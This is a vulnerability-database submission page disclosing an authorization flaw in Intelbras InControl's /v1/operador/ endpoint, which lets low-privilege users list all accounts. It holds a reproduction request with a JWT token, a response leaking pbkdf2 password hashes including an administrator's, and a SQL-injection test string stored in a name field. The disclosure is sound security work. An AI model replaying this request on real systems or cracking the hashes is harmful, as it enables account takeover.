Submit #579544: Intelbras InControl 2.21.60.9 Information Disclosureinfo

TitleIntelbras InControl 2.21.60.9 Information Disclosure
DescriptionThere is a Password Hash disclosure in the InControl application. There are three types of users: Admin, Recepcionista and Porteiro. Every type of user can make a GET request in the users "/v1/operador/" endpoint, which lists every user registered in the application. This endpoint returns a JSON object that contains a lot of information about the users, including id, username, password (hashed), and other informations. Here is an example of the GET request with Recepcionista privileges (which in the frontend it doesn't have permission to list users): GET /v1/operador/ HTTP/1.1 Host: localhost:4441 Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozLCJ1c2VybmFtZSI6ImNlc2FyIiwiZXhwIjoxNzQ3NTAzODE4LCJlbWFpbCI6IiIsImlzX2FjdGl2ZSI6dHJ1ZSwiaXNfc3VwZXJ1c2VyIjpmYWxzZSwicGVzc29hIjp7Im5vbWUiOiJhcm5hbGRvIn0sInBlcm1pc3Npb25zIjp7ImNyZWRlbmNpYWwiOnsiY29udHJvbGVyZW1vdG8iOnsiaWRfcGVybWlzc2FvX3ZpZXciOjI2OH0sImhpc3RvcmljYWxiaW9tZXRyaWFkaWdpdGFsIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI0OSwiaWRfcGVybWlzc2FvX2NoYW5nZSI6MjUwLCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyNTEsImlkX3Blcm1pc3Nhb192aWV3IjoyNTJ9fSwiZXZlbnRvX29wZXJhZG9yIjp7Imhpc3RvcmljYWxldmVudG9vcGVyYWRvciI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxODEsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjE4MiwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTgzLCJpZF9wZXJtaXNzYW9fdmlldyI6MTg0fX0sImdydXBvX3BvbnRvc19hY2Vzc28iOnsiaGlzdG9yaWNhbGdydXBvcG9udG9zYWNlc3NvIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI5NywiaWRfcGVybWlzc2FvX2NoYW5nZSI6Mjk4LCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyOTksImlkX3Blcm1pc3Nhb192aWV3IjozMDB9fSwidXN1YXJpbyI6eyJjYW1wb3NwZXJzb25hbGl6YWRvcyI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMTcsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjExOCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTE5LCJpZF9wZXJtaXNzYW9fdmlldyI6MTIwfSwidXNlcnNncm91cCI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMjksImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjEzMCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTMxLCJpZF9wZXJtaXNzYW9fdmlldyI6MTMyfX19fQ.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc Accept-Language: pt-BR,pt;q=0.9 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Origin: https://localhost:4445 Referer: https://localhost:4445/ Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- And here is an example of the HTTP response with disclosure of password hashes: HTTP/1.1 200 OK Date: Fri, 16 May 2025 19:02:07 GMT Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7 Vary: Accept,Origin,Cookie Allow: GET, POST, DELETE, HEAD, OPTIONS Content-Length: 40484 Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json {"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,
Source⚠️ https://localhost:4441/v1/operador/
User
 lorenzomoulin (UID 33175)
Submission05/16/2025 21:07 (11 months ago)
Moderation08/04/2025 07:41 (3 months later)
StatusAccepted
VulDB entry318641 [Intelbras InControl 2.21.60.9 JSON Endpoint /v1/operador/ information disclosure]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!